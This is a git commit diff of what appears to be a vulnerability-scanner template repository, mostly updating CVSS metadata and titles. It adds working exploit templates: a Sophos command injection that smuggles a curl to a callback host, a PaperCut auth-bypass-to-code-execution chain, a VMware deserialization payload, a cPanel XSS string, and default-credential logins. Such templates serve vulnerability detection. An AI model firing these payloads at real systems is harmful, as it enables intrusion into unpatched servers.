Merge branch 'main' into add-max-request

patch-1
Sandeep Singh 2023-04-29 13:32:16 +05:30 committed by GitHub
commit 28f4302dcd
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
83 changed files with 915 additions and 201 deletions

View File

@ -1,7 +1,14 @@
http/cves/2020/CVE-2020-27481.yaml
http/cves/2021/CVE-2021-30175.yaml
http/cves/2023/CVE-2023-1671.yaml
http/cves/2023/CVE-2023-20864.yaml
http/cves/2023/CVE-2023-27350.yaml
http/cves/2023/CVE-2023-27524.yaml
http/cves/2023/CVE-2023-29489.yaml
http/cves/2023/CVE-2023-29922.yaml
http/default-logins/powerjob-default-login.yaml
http/exposed-panels/papercut-ng-panel.yaml
http/exposed-panels/proxmox-panel.yaml
http/exposed-panels/sophos-web-appliance.yaml
http/osint/mail-archive.yaml
http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml

View File

@ -1,14 +1,18 @@
id: dmarc-detect
info:
name: DNS DMARC Detection
name: DNS DMARC - Detect
author: juliosmelo
severity: info
description: |
DMARC is an open email authentication protocol that provides domain-level protection of the email channel. DMARC authentication detects and prevents email spoofing techniques used in phishing, business email compromise (BEC) and other email-based attacks.
DNS DMARC information was detected.
reference:
- https://dmarc.org/
- https://dmarc.org/wiki/FAQ#Why_is_DMARC_important.3F
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: dns,dmarc
metadata:
max-request: 1
@ -22,3 +26,5 @@ dns:
group: 1
regex:
- "IN\tTXT\t(.+)"
# Enhanced by md on 2023/04/20

View File

@ -1 +1 @@
4.3.5.1
4.3.6.1

View File

@ -1 +1 @@
3.0.8
3.0.9

View File

@ -1 +1 @@
3.0.34
3.0.36

View File

@ -1 +1 @@
1.7.8
1.7.9

View File

@ -1 +1 @@
3.2.4
3.2.5

View File

@ -1 +1 @@
7.6.9
7.7.0

View File

@ -1 +1 @@
2.4.8
2.4.9

View File

@ -1 +1 @@
4.9.53
4.9.54

View File

@ -1 +1 @@
1.4.1
1.4.3

View File

@ -1 +1 @@
0.8
0.8.1

View File

@ -1 +1 @@
1.1.4
1.1.5

View File

@ -1 +1 @@
9.0.18
9.0.19

View File

@ -14,10 +14,10 @@ info:
- http://web.archive.org/web/20210129020617/https://www.securityfocus.com/bid/5763/
- https://nvd.nist.gov/vuln/detail/CVE-2002-1131
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cwe-id: CWE-80
cve-id: CVE-2002-1131
cwe-id: NVD-CWE-Other
cvss-score: 7.5
tags: cve2002,edb,xss,squirrelmail,cve
metadata:
max-request: 5

View File

@ -12,10 +12,10 @@ info:
- http://packetstormsecurity.org/1010-exploits/joomlajstore-lfi.txt
remediation: Upgrade to a supported version.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C
cve-id: CVE-2010-5286
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
cvss-score: 10.0
cve-id: CVE-2010-5286
tags: cve,cve2010,joomla,lfi,edb,packetstorm
metadata:
max-request: 1

View File

@ -11,10 +11,10 @@ info:
- http://web.archive.org/web/20210121221715/https://www.securityfocus.com/bid/51788/
- http://www.open-emr.org/wiki/index.php/OpenEMR_Patches
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:S/C:P/I:N/A:N
cvss-score: 3.5
cve-id: CVE-2012-0991
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
cve-id: CVE-2012-0991
tags: lfi,openemr,traversal,edb,cve,cve2012
metadata:
max-request: 1

View File

@ -12,10 +12,10 @@ info:
- https://bugs.php.net/bug.php?id=61910
- http://www.php.net/ChangeLog-5.php#5.4.2
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cvss-score: 7.5
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-77
cve-id: CVE-2012-1823
cwe-id: CWE-20
tags: cve2012,kev,vulhub,rce,php,cve
metadata:
max-request: 1

View File

@ -3,7 +3,7 @@ id: CVE-2013-2248
info:
name: Apache Struts - Multiple Open Redirection Vulnerabilities
author: 0x_Akoko
severity: low
severity: medium
description: Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.
reference:
- https://www.exploit-db.com/exploits/38666
@ -12,10 +12,10 @@ info:
- http://struts.apache.org/release/2.3.x/docs/s2-017.html
remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N
cvss-score: 5.8
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-601
cve-id: CVE-2013-2248
cwe-id: CWE-20
tags: cve,cve2013,apache,redirect,struts,edb
metadata:
max-request: 1

View File

@ -13,10 +13,10 @@ info:
- https://wpscan.com/vulnerability/1d64d0cb-6b71-47bb-8807-7c8350922582
- https://nvd.nist.gov/vuln/detail/CVE-2014-2383
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N
cvss-score: 4.3
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
cve-id: CVE-2014-2383
cwe-id: CWE-200
metadata:
max-request: 11
verified: "true"

View File

@ -12,10 +12,10 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2014-3120
- http://bouk.co/blog/elasticsearch-rce/
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
cvss-score: 6.8
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-77
cve-id: CVE-2014-3120
cwe-id: CWE-284
tags: rce,elasticsearch,kev,vulhub,cve,cve2014,elastic
metadata:
max-request: 1

View File

@ -1,19 +1,19 @@
id: CVE-2014-4940
info:
name: WordPress Plugin Tera Charts - Directory Traversal
name: WordPress Plugin Tera Charts - Local File Inclusion
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php.
description: Multiple local file inclusion vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-4940
- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=851874%40tera-charts&old=799253%40tera-charts&sfp_email=&sfph_mail=
- http://codevigilant.com/disclosure/wp-plugin-tera-chart-local-file-inclusion/
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cve-id: CVE-2014-4940
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
cvss-score: 5.0
cve-id: CVE-2014-4940
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/tera-charts"

View File

@ -1,19 +1,19 @@
id: CVE-2014-5111
info:
name: Fonality trixbox - Directory Traversal
name: Fonality trixbox - Local File Inclusion
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/.
description: Multiple local file inclusion vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/.
reference:
- https://www.exploit-db.com/exploits/39351
- https://nvd.nist.gov/vuln/detail/CVE-2014-5111
- http://packetstormsecurity.com/files/127522/Trixbox-XSS-LFI-SQL-Injection-Code-Execution.html
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cve-id: CVE-2014-5111
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
cvss-score: 5.0
cve-id: CVE-2014-5111
tags: packetstorm,cve,cve2014,lfi,trixbox,edb
metadata:
max-request: 1

View File

@ -11,10 +11,10 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2015-0554
- http://www.exploit-db.com/exploits/35721
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:C
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-200
cve-id: CVE-2015-0554
cwe-id: CWE-264
cvss-score: 9.4
tags: pirelli,router,disclosure,edb,packetstorm,cve,cve2015
metadata:
max-request: 1

View File

@ -11,10 +11,10 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2015-1427
- http://web.archive.org/web/20210506011817/https://www.securityfocus.com/bid/72585
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cvss-score: 7.5
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-77
cve-id: CVE-2015-1427
cwe-id: CWE-284
tags: cve,cve2015,elastic,rce,elasticsearch,kev
metadata:
max-request: 2

View File

@ -1,16 +1,17 @@
id: CVE-2017-16894
info:
name: Laravel framework < 5.5.21 - Infomation Disclosure
name: Laravel <5.5.21 - Information Disclosure
author: j4vaovo
severity: high
description: |
In Laravel framework through 5.5.21, remote attackers can obtain sensitive information (such as externally usable passwords) via a direct request for the /.env URI. NOTE: this CVE is only about Laravel framework's writeNewEnvironmentFileWith function in src/Illuminate/Foundation/Console/KeyGenerateCommand.php, which uses file_put_contents without restricting the .env permissions. The .env filename is not used exclusively by Laravel framework.
Laravel through 5.5.21 is susceptible to information disclosure. An attacker can obtain sensitive information such as externally usable passwords via a direct request for the /.env URI. NOTE: CVE pertains only to the writeNewEnvironmentFileWith function in src/Illuminate/Foundation/Console/KeyGenerateCommand.php, which uses file_put_contents without restricting .env permissions. The .env filename is not used exclusively by Laravel.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16894
- https://packetstormsecurity.com/files/cve/CVE-2017-16894
- http://whiteboyz.xyz/laravel-env-file-vuln.html
- https://twitter.com/finnwea/status/967709791442341888
- https://nvd.nist.gov/vuln/detail/CVE-2017-16894
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
@ -46,3 +47,5 @@ http:
- type: status
status:
- 200
# Enhanced by md on 2023/04/20

View File

@ -1,7 +1,7 @@
id: CVE-2018-8715
info:
name: AppWeb Authentication Bypass vulnerability
name: AppWeb - Authentication Bypass
author: milo2012
severity: high
description: The Embedthis HTTP library, and Appweb versions before 7.0.3, have a logic flaw related to the authCondition function in http/httpLib.c. With a forged HTTP request, it is possible to bypass authentication for the form and digest login types.
@ -9,11 +9,12 @@ info:
- https://github.com/embedthis/appweb/issues/610
- https://blogs.securiteam.com/index.php/archives/3676
- https://security.paloaltonetworks.com/CVE-2018-8715
- https://nvd.nist.gov/vuln/detail/CVE-2018-8715
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cwe-id: CWE-1391
cve-id: CVE-2018-8715
cwe-id: CWE-287
tags: cve,cve2018,appweb,auth-bypass
metadata:
max-request: 1
@ -35,3 +36,5 @@ http:
words:
- '<a class="logo" href="https://embedthis.com/">&nbsp;</a>'
part: body
# Enhanced by cs 04/25/2023

View File

@ -5,18 +5,19 @@ info:
author: johnk3r,pdteam
severity: high
description: |
A researcher reported a Directory Traversal Vulnerability in Serv-U 15.3. This may allow access to files relating to the Serv-U installation and server files. This issue has been resolved in Serv-U 15.3 Hotfix 1.
SolarWinds Serv-U 15.3 is susceptible to local file inclusion, which may allow an attacker access to installation and server files and also make it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://github.com/rissor41/SolarWinds-CVE-2021-35250
- https://nvd.nist.gov/vuln/detail/CVE-2021-35250
- https://support.solarwinds.com/SuccessCenter/s/article/Serv-U-15-3-HotFix-1?language=en_US
- https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35250
- https://twitter.com/shaybt12/status/1646966578695622662?s=43&t=5HOgSFut7Y75N7CBHEikSg
- https://nvd.nist.gov/vuln/detail/CVE-2021-35250
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-35250
cwe-id: CWE-22
remediation: Resolved in Serv-U 15.3 Hotfix 1.
metadata:
max-request: 1
shodan-query: product:"Rhinosoft Serv-U httpd"
@ -41,3 +42,5 @@ http:
- type: status
status:
- 401
# Enhanced by md on 2023/04/20

View File

@ -3,7 +3,7 @@ id: CVE-2022-0776
info:
name: RevealJS postMessage <4.3.0 - Cross-Site Scripting
author: LogicalHunter
severity: high
severity: medium
description: RevealJS postMessage before 4.3.0 contains a cross-site scripting vulnerability via the document object model.
reference:
- https://hackerone.com/reports/691977
@ -11,10 +11,10 @@ info:
- https://huntr.dev/bounties/be2b7ee4-f487-42e1-874a-6bcc410e4001/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0776
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cwe-id: CWE-80
cve-id: CVE-2022-0776
cwe-id: CWE-79
cvss-score: 6.1
tags: hackerone,huntr,cve,cve2022,headless,postmessage,revealjs
headless:

View File

@ -0,0 +1,42 @@
id: CVE-2023-1671
info:
name: Sophos Web Appliance - Remote Code Execution
author: Co5mos
severity: critical
description: |
A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code.
reference:
- https://vulncheck.com/blog/cve-2023-1671-analysis
- https://nvd.nist.gov/vuln/detail/CVE-2023-1671
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-1671
cwe-id: CWE-77
metadata:
verified: "true"
fofa-query: title="Sophos Web Appliance"
shodan-query: title:"Sophos Web Appliance"
tags: cve,cve2023,rce,sophos,oast
http:
- raw:
- |
POST /index.php?c=blocked&action=continue HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: curl/7.86.0
args_reason=filetypewarn&url={{randstr}}&filetype={{randstr}}&user={{randstr}}&user_encoded={{base64("\';curl http://{{interactsh-url}} #")}}
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: interactsh_request
words:
- "User-Agent: curl"

View File

@ -0,0 +1,51 @@
id: CVE-2023-20864
info:
name: VMware Aria Operations for Logs - Unauthenticated Remote Code Execution
author: rootxharsh,iamnoooob,pdresearch
severity: critical
description: |
VMware Aria Operations for Logs contains a deserialization vulnerability. An unauthenticated, malicious actor with network access to VMware Aria Operations for Logs may be able to execute arbitrary code as root.
reference:
- https://www.vmware.com/security/advisories/VMSA-2023-0007.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-20864
metadata:
verified: true
shodan-query: title:"vRealize Log Insight"
tags: cve,cve2023,vmware,aria,rce,oast
requests:
- raw:
- |
GET /csrf HTTP/1.1
Host: {{Hostname}}
X-Csrf-Token: Fetch
- |
POST /api/v2/internal/cluster/applyMembership HTTP/1.1
Host: {{Hostname}}
X-CSRF-Token: {{xcsrftoken}}
Content-type: application/octet-stream
{{generate_java_gadget("dns", "http://{{interactsh-url}}", "raw")}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: body
words:
- '"errorMessage":"Internal error'
extractors:
- type: kval
internal: true
name: xcsrftoken
group: 1
kval:
- "X_CSRF_Token"

View File

@ -1,20 +1,20 @@
id: CVE-2023-24737
info:
name: PMB v7.4.6 - Cross Site Scripting
name: PMB v7.4.6 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
PMB v7.4.6 allows an attacker to make a Reflected XSS on export_z3950.php endpoint via the same query parameter.
PMB v7.4.6 allows an attacker to perform a reflected XSS on export_z3950.php via the 'query' parameter.
reference:
- https://github.com/AetherBlack/CVE/blob/main/PMB/readme.md
- https://nvd.nist.gov/vuln/detail/CVE-2023-24737
- https://github.com/AetherBlack/CVE/tree/main/PMB
- https://nvd.nist.gov/vuln/detail/CVE-2023-24737
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cwe-id: CWE-80
cve-id: CVE-2023-24737
cwe-id: CWE-79
metadata:
max-request: 1
shodan-query: http.favicon.hash:1469328760
@ -42,3 +42,5 @@ http:
- type: status
status:
- 200
# Enhanced by cs 04/25/2023

View File

@ -5,11 +5,15 @@ info:
author: DhiyaneshDk
severity: medium
description: |
Appwrite up to v1.2.1 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /v1/avatars/favicon. This vulnerability allows attackers to access network resources and sensitive information via a crafted GET request.
Appwrite through 1.2.1 is susceptible to server-side request forgery via the component /v1/avatars/favicon. An attacker can potentially access network resources and sensitive information via a crafted GET request, thereby also making it possible to modify data and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://gist.github.com/b33t1e/43b26c31e895baf7e7aea2dbf9743a9a
- https://notes.sjtu.edu.cn/gMNlpByZSDiwrl9uZyHTKA
- https://nvd.nist.gov/vuln/detail/CVE-2023-27159
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cwe-id: CWE-918
cve-id: CVE-2023-27159
metadata:
max-request: 1
@ -33,3 +37,5 @@ http:
part: interactsh_request
words:
- "User-Agent: Appwrite-Server"
# Enhanced by md on 2023/04/20

View File

@ -0,0 +1,129 @@
id: CVE-2023-27350
info:
name: PaperCut - Unauthenticated Remote Code Execution
author: rootxharsh,iamnoooob,pdresearch
severity: critical
description: |
This vulnerability allows remote attackers to bypass authentication on affected installations of PaperCut NG 22.0.5 (Build 63914). Authentication is not required to exploit this vulnerability. The specific flaw exists within the SetupCompleted class. The issue results from improper access control. An attacker can leverage this vulnerability to bypass authentication and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-18987.
reference:
- https://www.horizon3.ai/papercut-cve-2023-27350-deep-dive-and-indicators-of-compromise/
- https://nvd.nist.gov/vuln/detail/CVE-2023-27350
- https://www.papercut.com/kb/Main/PO-1216-and-PO-1219
- https://www.zerodayinitiative.com/advisories/ZDI-23-233/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-27350
cwe-id: CWE-284
epss-score: 0.0117
metadata:
verified: "true"
shodan-query: http.html:"PaperCut"
tags: cve,cve2023,papercut,rce,oast,unauth,kev
variables:
cmd: "nslookup {{interactsh-url}}"
http:
- raw:
- |
GET /app?service=page/SetupCompleted HTTP/1.1
Host: {{Hostname}}
- |
POST /app HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
service=direct%2F1%2FSetupCompleted%2F%24Form&sp=S0&Form0=%24Hidden%2CanalyticsEnabled%2C%24Submit&%24Hidden=true&%24Submit=Login
- |
POST /app HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
service=direct%2F1%2FConfigEditor%2FquickFindForm&sp=S0&Form0=%24TextField%2CdoQuickFind%2Cclear&%24TextField=print-and-device.script.enabled&doQuickFind=Go
- |
POST /app HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
service=direct%2F1%2FConfigEditor%2F%24Form&sp=S1&Form1=%24TextField%240%2C%24Submit%2C%24Submit%240&%24TextField%240=Y&%24Submit=Update
- |
POST /app HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
service=direct%2F1%2FConfigEditor%2FquickFindForm&sp=S0&Form0=%24TextField%2CdoQuickFind%2Cclear&%24TextField=print.script.sandboxed&doQuickFind=Go
- |
POST /app HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
service=direct%2F1%2FConfigEditor%2F%24Form&sp=S1&Form1=%24TextField%240%2C%24Submit%2C%24Submit%240&%24TextField%240=N&%24Submit=Update
- |
GET /app?service=page/PrinterList HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
service=page%2FPrinterList
- |
POST /app?service=direct/1/PrinterList/selectPrinter&sp={{printerID}} HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
service=direct%2F1%2FPrinterList%2FselectPrinter&sp={{printerID}}
- |
POST /app HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
service=direct%2F1%2FPrinterDetails%2FprinterOptionsTab.tab&sp=4
- |
POST /app HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
service=direct%2F1%2FPrinterDetails%2F%24PrinterDetailsScript.%24Form&sp=S0&Form0=printerId%2CenablePrintScript%2CscriptBody%2C%24Submit%2C%24Submit%240%2C%24Submit%241&printerId={{printerID}}&enablePrintScript=on&scriptBody=function+printJobHook%28inputs%2C+actions%29+%7B%7D%0D%0Ajava.lang.Runtime.getRuntime%28%29.exec%28%27{{cmd}}%27%29%3B&%24Submit%241=Apply
cookie-reuse: true
host-redirects: true
max-redirects: 2
extractors:
- type: regex
part: body
internal: true
name: printerID
group: 1
regex:
- 'erList\/selectPrinterCost&amp;sp=([a-z0-9]+)">'
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: body
words:
- 'Avanceret kontering'

View File

@ -0,0 +1,29 @@
id: CVE-2023-29489
info:
name: cPanel - Cross-Site Scripting
author: DhiyaneshDk
severity: medium
reference: https://blog.assetnote.io/2023/04/26/xss-million-websites-cpanel/
metadata:
verified: "true"
shodan-query: title:"cPanel"
tags: cve,cve2023,cpanel,xss
http:
- method: GET
path:
- '{{BaseURL}}/cpanelwebcall/<img%20src=x%20onerror="prompt(document.domain)">aaaaaaaaaaaa'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src=x onerror="prompt(document.domain)">aaaaaaaaaaaa'
- 'Invalid webcall ID:'
condition: and
- type: status
status:
- 400

View File

@ -1,7 +1,7 @@
id: adminer-default-login
info:
name: Adminer - Default Login
name: Adminer Default Login - Detect
author: j4vaovo
severity: high
description: |
@ -62,3 +62,5 @@ http:
- type: status
status:
- 200
# Enhanced by md on 2023/04/20

View File

@ -1,12 +1,17 @@
id: empirec2-default-login
info:
name: Empire-C2 Default Login
name: Empire C2 Default Admin Login - Detect
author: clem9669
severity: high
description: Empire C2 contains a default admin login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://github.com/BC-SECURITY/Empire
- https://bc-security.gitbook.io/empire-wiki/quickstart/configuration/server
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
max-request: 1
verified: true
@ -43,3 +48,5 @@ http:
- type: status
status:
- 200
# Enhanced by md on 2023/04/20

View File

@ -1,10 +1,10 @@
id: jboss-jbpm-default-login
info:
name: JBoss jBPM Administration Console Default Login
name: JBoss jBPM Administration Console Default Login - Detect
author: DhiyaneshDk
severity: high
description: JBoss jBPM Administration default login information was discovered.
description: JBoss jBPM Administration Console default login information was detected.
reference:
- https://github.com/PortSwigger/j2ee-scan/blob/master/src/main/java/burp/j2ee/issues/impl/JBossjBPMAdminConsole.java
classification:
@ -64,3 +64,5 @@ http:
- type: status
status:
- 200
# Enhanced by md on 2023/04/20

View File

@ -1,12 +1,16 @@
id: magnolia-default-login
info:
name: Magnolia Default Login
name: Magnolia CMS Default Login - Detect
author: pussycat0x
severity: high
description: Mangnolia CMS default credentials were discovered.
description: Magnolia CMS default login credentials were detected.
reference:
- https://www.magnolia-cms.com/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-200
metadata:
max-request: 3
verified: "true"
@ -74,3 +78,5 @@ http:
- type: status
status:
- 200
# Enhanced by md on 2023/04/20

View File

@ -11,6 +11,9 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
verified: "true"
shodan-query: http.html:"symfony Profiler"
tags: default-login,minio
metadata:
max-request: 1
@ -24,6 +27,13 @@ http:
{"id":1,"jsonrpc":"2.0","params":{"username":"{{username}}","password":"{{password}}"},"method":"Web.Login"}
- |
POST /minio/webrpc HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"id":1,"jsonrpc":"2.0","params":{"username":"{{username}}","password":"{{password}}"},"method":"web.Login"}
payloads:
username:
- minioadmin
@ -49,5 +59,3 @@ http:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/10

View File

@ -1,16 +1,16 @@
id: nagiosxi-default-login
info:
name: NagiosXI - Default Login
name: Nagios XI Default Admin Login - Detect
author: ritikchaddha
severity: critical
description: NagiosXI default admin credentials were discovered.
description: Nagios XI default admin login credentials were detected.
reference:
- https://nagiosxi.demos.nagios.com/nagiosxi/login.php?redirect=/nagiosxi/index.php%3f&noauth=1
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.1
cwe-id: CWE-522
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-1391
metadata:
max-request: 6
verified: "true"
@ -68,3 +68,5 @@ http:
regex:
- 'name="nsp" value="(.*)">'
internal: true
# Enhanced by cs on 2023/04/26

View File

@ -0,0 +1,47 @@
id: powerjob-default-login
info:
name: PowerJob - Default Login
author: j4vaovo
severity: high
description: |
PowerJob default login credentials were discovered.
reference:
- https://www.yuque.com/powerjob/guidence/trial
metadata:
verified: "true"
shodan-query: http.title:"PowerJob"
fofa-query: title="PowerJob"
tags: powerjob,default-login
http:
- raw:
- |
POST /appInfo/assert HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"appName":{{username}},"password":{{password}}}
attack: pitchfork
payloads:
username:
- '"powerjob-worker-samples"'
password:
- '"powerjob123"'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{"success":true,"data":'
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200

View File

@ -1,11 +1,11 @@
id: trassir-default-login
info:
name: Trassir Webview - Default Login
name: Trassir WebView Default Login - Detect
author: gtrrnr,metascan
severity: high
description: |
Trassir contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
Trassir WebView contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://confluence.trassir.com/display/TKB/How+to+reset+the+administrator+password+on+the+TRASSIR+NVR
classification:
@ -52,3 +52,5 @@ http:
- type: status
status:
- 200
# Enhanced by md on 2023/04/20

View File

@ -5,6 +5,10 @@ info:
author: ritikchaddha
severity: info
description: Appwrite login panel was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 2
verified: "true"
@ -22,3 +26,5 @@ http:
- type: dsl
dsl:
- "status_code==200 && (\"-633108100\" == mmh3(base64_py(body)))"
# Enhanced by md on 2023/04/20

View File

@ -1,11 +1,15 @@
id: aspect-control-panel
info:
name: ASPECT Control Panel - Detect
name: ASPECT Control Panel Login - Detect
author: JustaAcat
severity: info
description: |
ASPECT Control login Panel was detected.
ASPECT Control Panel login was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
